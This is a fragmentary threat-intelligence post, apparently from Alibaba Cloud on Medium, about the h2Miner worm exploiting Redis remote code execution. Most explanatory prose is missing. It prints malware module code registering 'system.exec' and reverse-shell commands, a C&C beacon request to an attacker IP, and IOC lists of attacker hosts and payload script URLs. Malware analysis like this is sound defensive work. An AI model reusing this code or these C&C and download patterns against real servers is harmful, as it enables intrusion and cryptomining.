New Outbreak of h2Miner Worms Exploiting Redis RCE Detected

H2Miner Gang

Redis RCE

Worm Analysis

if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
  • Download the file and execute
  • Execute the mining program
  • Maintain C&C communication and execute commands
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip

Other Attack Methods

IOC

142.44.191.122/t.sh
185.92.74.42/h.sh
142.44.191.122/spr.sh
142.44.191.122/spre.sh
195.3.146.118/unk.sh
45.10.88.102
91.215.169.111
139.99.50.255
46.243.253.167
195.123.220.193

Security Advice

Original Source:

--

--

--

Follow me to keep abreast with the latest technology news, industry insights, and developer trends. Alibaba Cloud website:https://www.alibabacloud.com

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Infosec Course Materials .Learn and Share

Our pride in great SMEs … step forward ECS

Weekly Roundup Oct. 31st 2017

GDPR — HERE’S WHAT YOU NEED TO DO NOW

{UPDATE} Scary Helix baldii Hack Free Resources Generator

Taking security to the bank — moving money without getting ambushed

How to Create a Token Board

SATT is about to open its official website IDO

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Alibaba Cloud

Alibaba Cloud

Follow me to keep abreast with the latest technology news, industry insights, and developer trends. Alibaba Cloud website:https://www.alibabacloud.com

More from Medium

S3 POST Policy — The hidden S3 feature you haven’t heard of

IAM — AWS vs GCP part 2

OpenID Connect: Authentication between AWS and Bitbucket

Lessons Learned from Using AWS Cloud Directory